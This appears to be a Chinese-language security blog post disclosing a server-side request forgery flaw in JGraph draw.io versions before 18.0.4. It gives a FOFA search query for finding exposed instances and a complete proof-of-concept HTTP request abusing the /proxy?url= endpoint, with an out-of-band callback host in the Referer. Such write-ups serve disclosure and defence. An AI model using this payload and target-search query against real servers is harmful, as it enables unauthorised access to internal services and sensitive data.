漏洞描述

 

JGraph draw.io是JGraph的一个可配置的图表/白板可视化应用程序。
JGraph draw.io 18.0.4之前版本存在服务器端请求伪造漏洞。攻击者可利用该漏洞获取敏感信息。

影响范围

 

JGraph JGraph draw.io

网络测绘

 

FOFA:title=”Flowchart Maker”

 

漏洞复现

 

POC:

GET /proxy?url=http%3a//0:8080/ HTTP/1.1
Host: 127.0.0.1:8080
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/?mode=device&title=Untitled%20Diagram.drawio.xml&create=https%3A%2F%2Fxcd8bz39zlnis2ngq84j05tt7kda1z.oastify.com%2F&sync=manual&db=0&gh=0&tr=0&gapi=0&od=0&gl=0
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

 

paylod:/proxy?url=http%3a//0:8080/

 

 

(本文仅用作技术交流学习用途,严禁将该文内容用于违法行为)

 

发表回复

后才能评论